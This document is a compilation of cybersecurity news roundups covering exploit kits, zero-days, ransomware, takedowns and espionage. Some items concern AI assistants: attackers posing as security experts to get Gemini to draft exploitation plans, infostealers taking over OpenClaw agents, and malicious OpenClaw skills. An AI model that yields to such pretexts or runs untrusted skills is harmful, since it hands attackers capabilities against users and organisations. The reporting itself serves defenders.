A new iOS exploit chain and payload dubbed ‘DarkSword’ is stealing sensitive personal information from iPhones running iOS 18.4 to 18.7. The toolkit is linked to multiple threat actors, including Russian-aligned UNC6353, who previously leveraged a similar exploit chain called Coruna. DarkSword was subsequently uncovered while various researchers analyzed Coruna’s infrastructure.

In early November 2025, NC6748 used DarkSword against Saudi Arabian users via a Snapchat-themed website. Subsequently, other attackers linked to PARS Defense, a Turkish commercial surveillance firm, started running the exploit kit on Apple devices. Early this year, cases involving DarkSword were spotted across Malaysia and, most recently, it has been leveraged to target Ukrainian users.

DarkSword exploits six documented vulnerabilities (CVE-2025-31277, CVE-2025-43529, CVE-2026-20700, CVE-2025-14174, CVE-2025-43510, CVE-2025-43520), which Apple has since patched. Threat actors have used them to deliver at least three malware families: GHOSTBLADE (a data miner collecting crypto, messages, photos, and locations), GHOSTKNIFE (a backdoor exfiltrating accounts and communications), and GHOSTSABER (a JavaScript backdoor enumerating devices and executing code).

The delivery chain begins via Safari exploits, gaining kernel access and executing a main orchestrator (pe_main.js) that injects modules into privileged iOS services, including App Access, Wi-Fi, Keychain, and iCloud. Collected data spans passwords, messages, contacts, call history, location, browser history, Apple Health, and cryptocurrency wallets. The malware removes traces after exfiltration, indicating a focus on rapid theft rather than persistent surveillance.

Experts note that both DarkSword and Coruna exhibit signs of large language model (LLM)-assisted code expansion, showing professional design with maintainability and modularity in mind. Users are advised to update to iOS 26.3.1 and enable Lockdown Mode if at high risk.

The Ugly | Interlock Ransomware Exploits Cisco FMC Zero-Day to Breach Enterprise Firewalls

The Interlock ransomware group has been actively exploiting a critical remote code execution (RCE) zero-day in Cisco’s Secure Firewall Management Center (FMC) software since late January 2026. The vulnerability, tracked as CVE-2026-20131 (CVSS: 10.0), allows unauthenticated attackers to execute arbitrary code with root privileges on unpatched devices due to a case of insecure deserialization of user-supplied Java byte stream. Cisco has since issued a patch, urging customers to update immediately.

Interlock ransomware group is now exploiting a Cisco firewall bug patched on March 4

The bug is a CVSSv3 10/10 RCE in the Cisco Secure Firewall Management Center (FMC) Software: sec.cloudapps.cisco.com/security/cen…

[image or embed]

— Catalin Cimpanu (@campuscodi.risky.biz) 19 March 2026 at 10:42

Interlock, first seen in September 2024, has a history of high-profile attacks, including deploying the NodeSnake remote access trojan (RAT) against U.K. universities. The group has claimed responsibility for incidents affecting organizations such as DaVita, Kettering Health, the Texas Tech University System, and the city of Saint Paul, Minnesota. IBM X-Force researchers recently noted Interlock’s deployment of a new AI-assisted malware strain called Slopoly, highlighting the group’s evolving capabilities.

Latest reports explain that Interlock exploited the FMC flaw 36 days before its public disclosure, beginning on January 26, giving operators a head start to compromise firewalls before defenders were aware. This early access allowed attackers to operate undetected, underlining the danger of zero-day vulnerabilities.

Cisco has faced a series of zero-day exploits in 2026 so far. Earlier this year, maximum-severity flaws in Cisco AsyncOS email appliances, Unified Communications, and Catalyst SD-WAN were patched after being actively exploited, allowing attackers to bypass authentication, compromise controllers, and insert malicious peers.

The most recent incidents affecting FMC demonstrate both Interlock’s aggressive targeting of enterprise networks and the importance of rapid patching management and coordinated vulnerability disclosure. Organizations using Cisco FMC are strongly urged to apply the latest updates to mitigate ongoing risk.

The Good | Authorities Disrupt Proxy Network and Charge BlackCat Insider, Vendors Patch Critical RCE Bugs

U.S. and European law enforcement have dismantled the SocksEscort cybercrime proxy network, which relied on Linux edge devices infected with AVRecon malware. New research found that the service maintained roughly 20,000 compromised devices weekly and offered criminals access to ‘clean’ residential IP addresses from major internet service providers to evade blocklists. Since 2020, the platform has advertised access to hundreds of thousands of IPs. Now, authorities have seized dozens of servers and domains, froze $3.5 million in cryptocurrency, and disconnected infected routers, all previously linked to significant fraud and cryptocurrency theft.

Former DigitalMint employee Angelo Martino has been charged for conspiring with the BlackCat (aka ALPHV) ransomware group while serving as a ransomware negotiator. Prosecutors say Martino shared confidential negotiation details and participated in attacks with various accomplices between 2023 and 2025, operating as BlackCat affiliates. Victims included multiple U.S. organizations, with ransom payments exceeding $26 million and payments to BlackCat operators valued at a 20% cut of proceeds. Since the emergence of the group in 2021, the FBI has attributed to it thousands of targets and over $300 million in ransom payments.

Microsoft’s Patch Tuesday for the month delivers security updates for 79 vulnerabilities, including two publicly disclosed zero day flaws. The release also addresses three critical vulnerabilities including two remote code execution (RCE) bugs and one information disclosure issue.

The two zero days, an SQL Server elevation-of-privilege flaw (CVE-2026-21262) and a .NET denial-of-service bug (CVE-2026-26127), are not known to be actively exploited. The RCE bugs in Microsoft Office however, are exploitable via the preview pane, as is an Excel information disclosure flaw (CVE-2026-26144) that could leak data through Copilot.

Users are urged to prioritize updates to secure Office, Excel, SQL Server, and .NET environments.

The Bad | Attackers Exploit FortiGate Next-Gen Firewalls to Breach Networks

Threat actors are exploiting FortiGate Next-Generation Firewall (NGFW) appliances to gain access to targeted networks. A new post from SentinelOne outlines a consistent theme across these attacks: targeted victims did not retain appliance logs, preventing understanding on how and when the intruders gained access.

What happens when the FortiGate next-generation firewall protecting your network becomes the backdoor?

Our DFIR team has been tracking a wave of FortiGate NGFW compromises. Attackers are exploiting vulnerabilities to extract config files, steal service account credentials,… pic.twitter.com/Q9egoLwfN2

— SentinelOne (@SentinelOne) March 10, 2026

To date, attackers have leveraged known vulnerabilities (CVE-2025-59718, CVE-2025-59719, and CVE-2026-24858) and weak credentials to extract configuration files containing service account credentials and network topology information. These accounts, often linked to Active Directory (AD) and Lightweight Directory Access Protocol (LDAP), allowed attackers to map roles, escalate privileges, and move laterally within environments.

In one case, an attacker compromised a FortiGate appliance in November 2025, creating a local administrator account named support and adding unrestricted firewall policies. The attacker later decrypted the configuration file to extract LDAP service account credentials, which were used to enroll rogue workstations into AD, enabling deeper access. Network scanning triggered alerts, stopping further lateral movement.

In another incident, attackers rapidly deployed legitimate Remote Monitoring and Management (RMM) tools, Pulseway and MeshAgent, and downloaded malware from AWS and Google Cloud storage. The Java payload, executed via DLL side-loading, exfiltrated the NTDS.dit file and SYSTEM registry hive to an external server, potentially enabling credential harvesting, though no subsequent misuse was observed.

These incidents highlight the high value of NGFW appliances, which threat actors are exploiting for cyber espionage or ransomware attacks. SentinelOne emphasizes enforcing strong administrative access controls, maintaining up-to-date patches, and retaining detailed FortiGate logs up to 14 days minimum, ideally sent to a Security Incident & Event Monitoring platform (SIEM), to detect configuration exports and unauthorized account creation. Proper monitoring, combined with automated defenses, can significantly reduce attacker dwell time and prevent full-scale network compromise.

The Ugly | Iran-Linked Hacktivist ‘Handala’ Wipes Stryker MedTech Systems Worldwide

Medical technology giant Stryker has suffered a major cyberattack involving wiper malware claimed by Handala, a pro-Palestinian hacktivist group linked to Iran.

Handala says it stole 50 terabytes of data and wiped over 200,000 systems, servers, and mobile devices, forcing office shutdowns in 79 countries. Employees in the U.S., Ireland, Costa Rica, and Australia reported that corporate and personal devices enrolled for work were wiped, disrupting access to Microsoft systems, Teams, VPNs, and other applications, with some locations reverting to manual workflows.

At the time of the incident, staff were instructed to remove corporate management and applications from personal devices. Stryker later confirmed the incident in a Form 8-K filing with the SEC, describing a global disruption affecting its Microsoft environment. The company activated its cybersecurity response plan and is working with internal teams and external experts. The incident appears contained and involved no ransomware, though full restoration timelines remain unknown.

Handala, active since December 2023, is known to target Israeli organizations with destructive malware that wipes Windows and Linux systems, often publishing stolen sensitive data. This attack marks a major disruption for Stryker, which employs over 53,000 people and reported $22.6 billion in global sales in 2024.

Cybersecurity experts warn that Iranian state-aligned actors, including APT groups and proxy hacktivists, frequently use cyber operations for retaliation and disruptive campaigns during geopolitical escalations. They are likely to increase attacks against U.S. organizations, critical infrastructure, and allied sectors. Organizations are urged to strengthen security controls and prepare for potential follow-on campaigns targeting networks and operations.

The Good | Global Authorities Disrupt Tycoon2FA, LeakBase & Phobos Ransomware

Europol has successfully disrupted Tycoon2FA in an international operation, taking down the phishing-as-a-service (PhaaS) platform responsible for sending tens of millions of phishing emails each month. Authorities seized 330 domains used to host phishing pages and control infrastructure.

Active since 2023, Tycoon2FA enabled attackers to bypass multi-factor authentication (MFA) using adversary-in-the-middle (AitM) techniques that captured credentials and session cookies. Sold through Telegram for about $120, the service allowed low-skill criminals to launch large-scale phishing attacks against organizations worldwide.

In another seizure, LeakBase, a major cybercrime forum used to trade stolen data and hacking tools, was taken down as part of Operation Leak, a joint effort by the FBI, Europol, and law enforcement in 14 countries. Police seized two domains, posted seizure banners, executed search warrants, and made arrests worldwide.

LeakBase had amassed 142,000 members since 2021 and offered leaked databases, exploits, and cybercrime services. All forum data, including accounts, messages, and IP logs, have been preserved for evidence, with the seizure now entering a prevention phase to deter further cybercrime.

A Russian national, Evgenii Ptitsyn, has pleaded guilty to wire fraud conspiracy for his role running the Phobos ransomware operation. Since 2020, Phobos has targeted over 1000 organizations worldwide, including schools, hospitals, and government agencies, collecting more than $39 million in ransom payments. Phobos affiliates were responsible for infiltrating victim networks, encrypting data, exfiltrating sensitive files, and paying Ptitsyn a per-deployment fee in exchange for the corresponding decryption keys.

Ptitsyn himself managed ransomware sales, distributed decryption keys, and took a cut of all affiliate payments. His sentencing is scheduled for July 15, facing up to 20 years.

The Bad | Researchers Uncover ‘Coruna’ Exploit Kit Mass Targeting iOS Devices

Multiple threat actors have deployed Coruna, a previously unknown iOS exploit kit containing 23 exploits and five complete exploit chains capable of targeting Apple devices running iOS 13 through iOS 17.2.1.

Researchers first observed parts of the Coruna framework in February 2025 while investigating activity linked to a commercial surveillance vendor. The exploit kit uses a sophisticated JavaScript delivery framework that fingerprints a victim’s device and operating system before selecting the most effective exploit chain.

Several of the exploits rely on advanced techniques such as WebKit remote code execution (RCE), pointer authentication code (PAC) bypasses, sandbox escapes, kernel privilege escalation, and Page Protection Layer (PPL) bypasses. Some vulnerabilities included in the kit were previously associated with Operation Triangulation, a high-profile iOS espionage campaign uncovered in June 2023.

Over time, Coruna has spread across different threat ecosystems. In mid-2025, a suspected Russian espionage group UNC6353 used the framework in watering hole attacks targeting visitors to compromised Ukrainian websites. Later that year, the exploit kit appeared on fake Chinese cryptocurrency and gambling websites linked to a financially-motivated threat actor.

Once exploitation succeeds, attackers deploy a loader known as PlasmaLoader, which downloads additional modules designed primarily to steal cryptocurrency wallet data and sensitive information. Targeted data includes wallet recovery phrases, financial information, and other stored text. Stolen data is encrypted before being transmitted to attacker-controlled infrastructure.

Coruna demonstrates how advanced spyware-grade exploit frameworks can spread from surveillance vendors to nation-state actors and eventually cybercriminal groups, highlighting the growing commercialization and reuse of sophisticated zero-day capabilities in the mobile threat landscape.

The Ugly | Hacktivists Launch Retaliatory Cyberattacks After U.S.–Israel Strikes on Iran

Following the U.S.-Israel military operations against Iran, cybersecurity researchers are flagging a spike in retaliatory hacktivist activity codenamed as ‘Epic Fury’ and ‘Roaring Lion’. The surge has primarily taken the form of distributed denial-of-service (DDoS) attacks, data leaks, and online disruption targeting both government and critical infrastructure organizations.

A new report describes how three main hacktivist groups, Keymous+, DieNet, and NoName057(16), have been responsible for nearly 70% of observed attack activity between February 28 and March 2, 2026. The first recorded attack during this period was launched by Hider Nex (aka Tunisian Maskers Cyber Force), a pro-Palestinian hacktivist collective that combines DDoS attacks with data breaches to support geopolitical messaging.

In total, researchers recorded 149 DDoS attacks targeting 110 organizations across 16 countries, carried out by 12 hacktivist groups. The majority of attacks focused on the Middle East, with 107 incidents targeting regional organizations. Government entities were the most affected sector, accounting for nearly 48% of the victims, followed by organizations in financial services and telecommunications.

Several other cyber threats have emerged alongside the hacktivist campaigns. Pro-Russian groups are claiming breaches of Israeli military networks, while threat actors have an active SMS phishing campaign distributing malware disguised as an Israeli civil defense alert app. Iranian state-linked actors associated with the Islamic Revolutionary Guard Corps (IRGC) have reportedly targeted regional energy and digital infrastructure, striking major oil refineries and data centers in the U.A.E.

Iranian-aligned cyber actors have historically blended espionage, disruption, and influence operations during geopolitical crises, suggesting the potential for broader targeting of government, infrastructure, financial, and technology sectors applicable on a global scale, too.

The Good | Authorities Arrest Hacktivist & Convict L3Harris Insider for Selling Secrets to Russia

Spanish authorities have arrested four suspected members of “Anonymous Fénix”, a hacktivist group accused of launching distributed denial-of-service (DDoS) attacks against government ministries, political parties, and public institutions in Spain and parts of South America.

According to the Spanish Civil Guard, the group intensified its operations after the deadly Valencia floods in October 2024, blaming officials for the disaster. The suspects allegedly used X and Telegram to spread anti-government propaganda and recruit volunteers. Courts have since shut down the group’s social media accounts and messaging channels as part of a broader crackdown on cybercrime networks.

In the U.S., a former executive at defense contractor L3Harris Technologies has been sentenced to over seven years in prison for stealing classified zero-day exploits and selling them to a Russian cyber-weapons broker. Peter Williams, who led the firm’s Trenchant cybersecurity unit, admitted taking at least eight sensitive exploit components between 2022 and 2025, using an external drive and encrypted transfers. He sold the tools, developed exclusively for U.S. and allied intelligence agencies, for millions of dollars in cryptocurrency.

U.S. prosecutors said the theft caused tens of millions in losses and posed a severe national security risk. The broker, Operation Zero, allegedly resells exploits to Russian government and private clients. The Department of the Treasury simultaneously imposed sanctions on the company, its owner Sergey Sergeyevich Zelenyuk, and affiliated entities under a law targeting intellectual property theft by foreign adversaries.

Williams pleaded guilty in October 2025 and was ordered to forfeit cash, cryptocurrency, property, and luxury assets. Insider threats endangering national defense capabilities continue to rise and officials warn that trafficking in offensive cyber tools has become a lucrative global black market.

The Bad | ‘MuddyWater’ Actors Launch Operation Across the MENA Region with New Malware

MuddyWater (aka TEMP.Zagros, TA450, G0069), an Iranian state-linked threat actor, has initiated a new cyber campaign dubbed “Operation Olalampo”, which targets organizations and individuals across the Middle East and North Africa (MENA) amid ongoing regional tensions. First observed in January, new research observes the operation introducing novel malware variants while maintaining tactics consistent with the group’s past intrusions.

The campaign relies heavily on phishing emails carrying malicious Microsoft Office attachments that trigger macro-based infections. Victims are tricked into enabling macros, which deploy novel downloaders GhostFetch and HTTP_VIP. These tools profile compromised systems, evade legacy defenses, and deliver secondary payloads including the novel GhostBackDoor malware, an implant capable of remote command execution, file manipulation, and persistent access. In some cases, attackers deploy legitimate remote administration software to blend malicious activity with normal operations.

A notable addition is CHAR, another novel Rust-based backdoor controlled through a Telegram bot for command-and-control (C2), enabling attackers to execute commands, exfiltrate data, and launch additional malware. Analysis indicates possible AI-assisted development, reflecting threat actors increasing experimentation with generative tools to accelerate malware creation. Researchers also noted infrastructure reuse from late 2025, suggesting sustained operations rather than isolated attacks.

Operation Olalampo points to MuddyWater’s focus on post-exploitation control, including reconnaissance, credential harvesting, and lateral movement. The group has also exploited vulnerabilities in public-facing servers to gain initial access. Security analysts warn that the campaign is a sign of broader plans to target network edge systems and critical sectors to establish long-term footholds, reinforcing concerns about nation-state-backed cyber operations expanding in scope and sophistication across the MENA region.

Defenders are urged to prioritize phishing resistance and monitor for unusual outbound communications to messaging platforms often used as C2 channels.

The Ugly | Attackers Exploit Critical Cisco SD-WAN Flaw to Target National Infrastructure

Cisco has disclosed an active zero-day exploitation of a critical authentication bypass in its Catalyst SD-WAN platform, a maximum-severity flaw that lets remote attackers compromise controllers and insert malicious peers into targeted networks. The flaw, tracked as CVE-2026-20127, affects both on-premises and cloud deployments of SD-WAN Controller, Manager, and Cloud products.

The vulnerability stems from a broken peering authentication mechanism that can be abused with crafted requests. Successful exploitation grants attackers high-privilege internal access, enabling manipulation of network configurations via NETCONF. By adding malicious peers that appear legitimate, adversaries can route traffic, advertise attacker-controlled networks, and pivot deeper into affected environments.

Cisco Talos attributes the campaign, tracked as UAT-8616, to a sophisticated threat actor active since at least 2023. Investigators believe attackers escalated privileges by downgrading to an older version of the software, exploiting an older root-level flaw (CVE-2022-20775), then restoring the original version to evade detection while retaining control. Talos also links the activity to a broader pattern of targeting network edge devices to gain footholds in high-value organizations, including critical national infrastructure (CNI) operators, suggesting possible nation-state backing.

Government agencies warn the threat is global and ongoing. So far, CISA has issued an emergency directive ordering federal agencies to inventory devices, collect forensic evidence, and patch immediately, while the UK’s National Cyber Security Centre urges organizations to report signs of compromise and follow hardening guidance to minimize risk.

Indicators or compromise include suspicious authentication logs, unauthorized SSH keys, rogue accounts, log tampering, and unexplained software downgrades. Authorities also stress that SD-WAN management interfaces should never be internet-exposed and recommend isolating control systems, forwarding logs externally, and applying updates.

The Good | Law Enforcement Arrest Extortionist, Phobos Affiliate & Financial Scammers

A Dutch man was arrested this week after he allegedly downloaded confidential documents mistakenly shared with him and tried to extort authorities by refusing to delete them without compensation. The man kept the files, prompting a hacking investigation and a search of his home. Authorities say knowingly accessing misdirected, sensitive data constitutes computer trespass and emphasize that recipients must report such mistakes and avoid keeping unauthorized materials.

In Poland, authorities detained an individual tied to the Phobos Ransomware-as-a-Service (RaaS) operation, seizing stolen credentials, credit card data, and server access information. The arrest, part of Europol-coordinated “Operation Aether”, specifically targets the group’s affiliates and infrastructure.

Investigators found files enabling unauthorized system access and confirmed that the suspect communicated with other Phobos actors via encrypted messaging. He now faces charges for producing and distributing hacking tools, facing up to five years in prison. The international operation is part of a wide effort to disrupt sprawling Phobos ransomware networks and warn potential targets of ongoing and emerging attacks.

A joint effort coordinated by Interpol’s African Joint Operation against Cybercrime (AFJOC) brought together various agencies to arrest 651 suspects and recover over $4.3 million in a coordinated crackdown on investment fraud, mobile money scams, and fake loan schemes. Tracked as “Operation Red Card 2.0”, law enforcement across 16 countries identified 1247 victims and targeted cybercrime linked to $45 million in losses.

Authorities seized 2341 devices, shut down 1442 malicious sites, and dismantled fraud networks in Nigeria, Kenya, and Côte d’Ivoire. Cross-border cooperation continues to be a key factor in combating organized cybercrime within regions of the world that are still rapidly digitizing.

The Bad | CRESCENTHARVEST Targets Protest Supporters in New Espionage Campaign

New research has brought to light a cyber espionage campaign, dubbed “CRESCENTHARVEST”, that targets Farsi-speaking supporters of Iran’s ongoing anti-government protests. Active since early January, the operation uses protest-themed lures to trick victims into launching malware designed for long-term surveillance and data theft.

The attackers distribute malicious archives filled with authentic protest images, videos, and reports in Farsi to appear credible and emotionally compelling, particularly to individuals seeking updates during internet blackouts and restricted media coverage.

Inside the archive are Windows shortcut files disguised as media using double extensions such as *.jpg.lnk and *.mp4.lnk. When opened, the file runs PowerShell commands to download additional payloads while displaying a harmless image or video to avoid suspicion. The infection chain then leverages a legitimate, signed system binary to sideload rogue libraries, ultimately installing a previously undocumented remote access trojan (RAT) that doubles as an information stealer.

Once deployed, the malware can execute commands, log keystrokes, capture browser credentials, harvest cookies, extract Telegram data, and collect extensive system information. It also identifies installed security tools, allowing the actors to adjust their behavior to remain undetected. The researhers say communication with command-and-control (C2) servers blends into normal web traffic, enabling persistent espionage.

Although the campaign is currently unattributed, the tactics and targeting strongly suggest alignment with Iranian state-backed interests. Researchers believe attackers likely relied on spearphishing or prolonged social engineering, sometimes building up relationships with targets over extended periods before delivering the malicious files.

The operation reflects a broader pattern of politically-motivated digital surveillance operations aimed at journalists, activists, researchers, and diaspora communities as attackers continue to piggyback off of the turbulence of geopolitical crises.

The Ugly | Infostealers Exfiltrate OpenClaw AI Assistant’s Operational Secrets

The rapid rise of OpenClaw, a locally running agentic AI assistant, has introduced a new class of security risk: malware that targets the assistant itself. Because the framework stores persistent memory, configuration data, and authentication material on the user’s device, it effectively becomes a vault of API keys, tokens, private keys, and sensitive personal context. Security researchers have now observed infostealing malware exfiltrating these files (openclaw.json, device.json, and soul.md) in real-world infections, marking a move from traditional credential theft techniques toward hijacking the inherent identities and capabilities of autonomous agents.

In this first in-the-wild instance, the malware did not exploit a vulnerability in the assistant. Instead, it used broad file-harvesting techniques that scan systems for keywords such as “token” and “private key”. This approach allows attackers to capture critical configuration files, including those that enable remote connections, device impersonation, and access to encrypted logs or cloud services. The stolen data could permit full takeover of the agent’s functions, effectively granting bad actors the same authority the assistant holds across email, apps, and online platforms.

Researchers warn that as agentic assistants become embedded in professional workflows, attackers will increasingly develop specialized tooling to parse these environments and weaponize them. Additional findings on this growing attack surface includes exposed instances vulnerable to remote code execution (RCE) and supply chain risks in community “skill” repositories.

In response to these emerging risks, Prompt Security from SentinelOne has introduced ClawSec and OneClaw, designed specifically for the agentic era to provide deep visibility into autonomous agent behavior and harden them from within. These tools help organizations monitor, control, and secure personal AI assistants such as OpenClaw, Nanobot, and Picoclaw before compromised agents can be leveraged as trusted insiders.

The Good | Authorities Crack Down on Identity, Romance Baiting & Phishing Schemes

Two individuals have been indicted for a years-long scheme that used stolen identities from 3,000 victims to siphon $3 million from sportsbooks. Amitoj Kapoor and Siddharth Lillaney allegedly bought personally identifying information (PII) on dark markets and Telegram, opened thousands of fake accounts on FanDuel, DraftKings, and BetMGM, and harvested new-user bonuses.

The pair allegedly used background-check services to pass verification checks and cashed out winnings via prepaid cards into controlled accounts. Prosecutors have filed for charges of fraud, identity theft, and money laundering charges carrying several decades in prison.

In further crackdowns on fraudulent schemes, a dual Chinese and St. Kitts & Nevis fugitive has been sentenced in absentia to 20 years for orchestrating a romance baiting crypto scam worth over $73 million.

Daren Li built trust with victims via messaging and dating apps before steering them into fake investments, then laundering the stolen funds through shell companies, U.S. bank accounts, and cryptocurrency platforms using assets like Tether. Arrested in 2024, Li fled two months ago while awaiting sentencing. Investigators tied the syndicate to hundreds of millions in laundered crypto and wider global losses.

Police in the Netherlands have arrested a man for allegedly selling access to JokerOTP, a phishing-as-a-service (PhaaS) tool that intercepts one-time passwords to hijack accounts. The suspect, the third arrest in a three-year long probe, allegedly marketed licenses via Telegram to criminals who used automated calls to impersonate trusted companies and trick victims into revealing codes and sensitive data.

Authorities say the service enabled over 28,000 attacks across 13 countries, causing roughly $10 million in losses and targeting accounts on PayPal, Venmo, Coinbase, and Apple. While investigations continue, dozens of JokerOTP bot buyers have already been identified and face prosecution in due time.

The Bad | APT Groups Weaponize Google Gemini in All Stages of Cyber Kill Chain

State-backed hackers and cybercriminals are increasingly exploiting Google’s Gemini AI to streamline their attacks from initial reconnaissance to post-compromise operations. According to new research, actors linked to China, Iran, North Korea, and Russia used the model for target profiling, phishing lure generation, translation, coding, vulnerability testing, command-and-control development, and data exfiltration.

Some operatives even posed as cybersecurity experts to trick the AI tool into producing detailed exploitation plans, including remote code execution (RCE) and web-application (WAF) firewall bypass techniques against specific targets in the U.S.

Iranian-linked threat group APT42 leveraged the model to accelerate social engineering campaigns and tailor malicious tools, while others integrated AI-assisted capabilities into malware such as a CoinBait phishing kit and HonestCue malware launcher. Criminal groups also used generative AI in ClickFix campaigns that delivered infostealing malware through deceptive troubleshooting ads. Researchers also noted signs of AI-generated code in malware artifacts, indicating that generative platforms are already shaping attacker toolchains.

Beyond direct abuse, the report observed attempts to extract and replicate Gemini itself through large-scale querying and “knowledge distillation” techniques, in which actors use data from one model to train fresh, more advanced ones. While this mostly threatens AI vendors’ intellectual property, it could also eventually affect end users of the tool as AI-as-a-Service continues to rise.

Google says it has disabled the malicious accounts and continues to harden its defenses to limit misuse and make it more difficult to exploit. However, researchers warn that AI integration will likely accelerate threat actor capabilities across cybercrime ecosystems, lowering barriers to entry and increasing the speed, scale, and sophistication of future attacks.

The Ugly | China-Based Actors Hit Major Singaporean Telcos in Ongoing Espionage Campaign

Singapore’s Cyber Security Agency (CSA) revealed this week that the China-linked threat actor UNC3886 has targeted each of the country’s four largest telecommunications (teleco) providers – Singtel, StarHub, M1, and Simba Telecom – at least once last year.

Using sophisticated tools and zero-day exploits, the APT gained limited access to critical systems. While it did not disrupt services or exfiltrate sensitive customer data, rootkits helped UNC3886 maintain stealthy persistence while siphoning technical data to support operational objectives.

CSA has since responded with “Operation Cyber Guardian”, an 11-month long campaign bringing together over 100 investigators across six government agencies to support. Authorities closed access points in the teleco networks, expanded monitoring, and blocked attempts to pivot into banking, transport, or healthcare networks. The agency also emphasized that while UNC3886’s intrusions were deliberate and well-planned, mitigation measures were able to prevent major disruption.

Active since at least 2022, the PRC-based actor is known to target virtualization technologies and edge devices, often fabricating scenarios to test and exploit vulnerabilities without triggering alerts. Previous activity included targeting telecommunications networks in the U.S. and Canada with the goal of developing cross-border espionage capabilities.

CSA described UNC3886 as “an advanced persistent threat with deep capabilities”, noting that the recent campaign demonstrates the ongoing risk to critical national infrastructure. The agency stressed the importance of cyber defense readiness, stating that rapid remediation, monitoring, and coordinated response measures continue to be key to containing the attacks and protecting Singapore’s teleco sector.

The Good | Former Google Engineer Steals AI Supercomputing Secrets for China

Former Google software engineer Linwei Ding has been found guilty of economic espionage and trade secret theft after stealing sensitive AI supercomputing information and covertly sharing it with Chinese technology interests.

Ding was first indicted in March 2024 following an internal Google investigation in which prosecutors say he was dishonest and uncooperative. His conduct ultimately led to his arrest in California. Trial evidence from between May 2022 and April 2023 note that Ding exfiltrated more than 2,000 pages of confidential technical documents from Google and uploaded them to his personal Google Cloud account.

The stolen materials detailed some of Google’s most sensitive AI infrastructure, including proprietary TPU and GPU architectures, large-scale AI workload orchestration software, SmartNIC networking designs, and internal supercomputing system configurations. These assets are the backbone of Google’s ability to train and operate advanced AI models at scale.

While employed at Google, Ding maintained undisclosed relationships with two China-based technology companies and negotiated a senior executive role as chief technology officer at one. Prosecutors showed that Ding told investors he could replicate Google-class AI supercomputing infrastructure.

Evidence presented at trial also linked Ding’s activities to Chinese government-backed initiatives. He applied to a Shanghai-sponsored talent program and stated his intention to help China achieve computing infrastructure on par with other global powers.

The DoJ noted that the jury heard extensive testimony about how such programs are used to advance China’s technological and economic goals. Ding is now convicted on seven counts each of economic espionage and trade secret theft, offenses that carry potential sentences of 10 to 15 years per count.

The Bad | Vishing Campaigns Hijack SSO to Enable Mass SaaS Data Theft

A surge in ShinyHunters SaaS data theft incidents has been linked to highly targeted voice phishing (vishing) campaigns that combine live phone calls with convincing, company-branded phishing sites.

In these attacks, threat actors impersonate corporate IT or helpdesk staff and contact employees directly, claiming MFA settings need urgent updates. Victims are then guided to fake SSO portals designed to capture credentials and MFA codes.

According to reports released this week from Okta and Mandiant, the attackers used advanced phishing kits that support real-time interaction.

While speaking with the victim, the attacker relays stolen credentials, triggers legitimate MFA challenges, and coaches the employee to approve push notifications or enter one-time passcodes. This enables the attacker to authenticate successfully and enroll their own MFA device, establishing persistent access.

Once inside, attackers pivot through centralized SSO dashboards such as Okta, Microsoft Entra, or Google, exposing the SaaS applications the compromised user has access to. For data theft and extortion groups, SSO access provides a single gateway to broader cloud data exposure.

The activity is being tracked across multiple threat clusters, including UNC6661, UNC6671, and UNC6240 (ShinyHunters). UNC6661 handles the initial compromise and data theft, while ShinyHunters conducts extortion and data leaks. A related cluster, UNC6671, uses similar vishing tactics but different infrastructure and more aggressive pressure techniques.

Investigators observed clear forensic indicators, including PowerShell-based downloads from SharePoint, suspicious Salesforce logins, bulk DocuSign exports, and the abuse of a Google Workspace add-on to delete security alerts and conceal the MFA changes.

Organizations are advised to tighten identity workflows around password resets, MFA changes, and device enrollment, and enable logging and alerts for suspicious sign‑ins, new app connections, and abnormal or high‑volume SaaS data access.

The Ugly | Attackers Flood OpenClaw with Malicious Skills to Steal Data

Over 200 malicious plug-ins, known as “skills” have been published in under a week for OpenClaw, a rapidly growing open-source personal AI assistant previously called ClawdBot and Moltbot. Discovered across GitHub and OpenClaw’s official registry “ClawHub”, these skills masquerade as legitimate utilities while secretly delivering information-stealing malware.

The malicious packages impersonate popular tools such as cryptocurrency trackers, financial utilities, and social media content services. In reality, they deploy malware designed to harvest API keys, cryptocurrency wallet data, SSH credentials, browser passwords, cloud secrets, and configuration files. Researchers report that many of the skills are near-identical clones with randomized names, suggesting an automated, large-scale campaign.

The skills include professional-looking documentation that instructs users to install a supposed prerequisite called “AuthTool”. Following these steps then triggers the malware delivery. On macOS, this involves base64-encoded shell commands that download payloads linked to NovaStealer or Atomic Stealer variants, while Windows users are prompted to run password-protected archives containing credential-stealing trojans.

The campaign coincides with the disclosure of a high-severity OpenClaw vulnerability (CVE-2026-25253) that enables one-click remote code execution through token exfiltration and WebSocket hijacking. Although patched in late January 2026, the flaw points to the platform’s growing attack surface.

Researchers warn that OpenClaw’s deep system access, persistent memory, and reliance on third-party skills make it an attractive target for supply chain attacks, reinforcing the need for isolation, restricted permissions, and careful vetting before deployment.

The rapid growth and decentralized nature of OpenClaw deployments mirror trends in unmanaged AI infrastructure, creating a large, publicly exposed attack surface that can be exploited by adversaries at scale. The combination of persistent memory, tool access, and remote capabilities makes these AI assistants particularly vulnerable to automated malware campaigns.

The Good | U.S. Authorities Charge ATM Hackers, Dismantle Darkmarket, and Seize ‘RAMP’ Forum

A U.S. federal grand jury has charged 31 defendants for their roles in an ATM jackpotting operation linked to Venezuela’s Tren de Aragua gang.

The indictment details 32 counts tied to the use of Ploutus malware to drain ATMs nationwide. After physically accessing the machines, suspects installed preloaded drives or USBs to deploy the malware, erase forensic evidence, and force cash dispensing until empty.

Prosecutors say the operation laundered millions to fund the gang, now officially designated a Foreign Terrorist Organization by U.S. authorities. This action follows two previous indictments from October and December 2025, bringing the total prosecutions to 87.

A Slovakian man has pleaded guilty to running Kingdom Market, a darkmarket that sold drugs, cybercrime tools, fake IDs, and stolen data. Alan Bill (aka Vend0r or KingdomOfficial) admitted conspiring to distribute controlled substances while operating the platform from 2021 to 2023.

During the probe, undercover agents bought fentanyl, methamphetamine, and a fraudulent U.S. passport before authorities seized the site in 2023. The investigation cited tens of thousands of users, crypto-based payments, and Bill’s role as the administrator. Sentencing is scheduled for this May as Bill faces 40 years of imprisonment and a possible $5 million fine.

The FBI has seized the infamous RAMP cybercrime forum, a platform that openly hosted ransomware advertising, malware, and hacking services. Both its Tor and clearnet domain now display an FBI seizure banner, suggesting investigators have access to user data that could expose the forum’s users and all linked threat actors.

The takedown of the 5-year old forum removes one of the last centralized hubs where ransomware operators could openly advertise or trade access to networks, recruit affiliates, and coordinate at scale.

The Bad | 175,000 AI Systems Exposed Without Security Controls

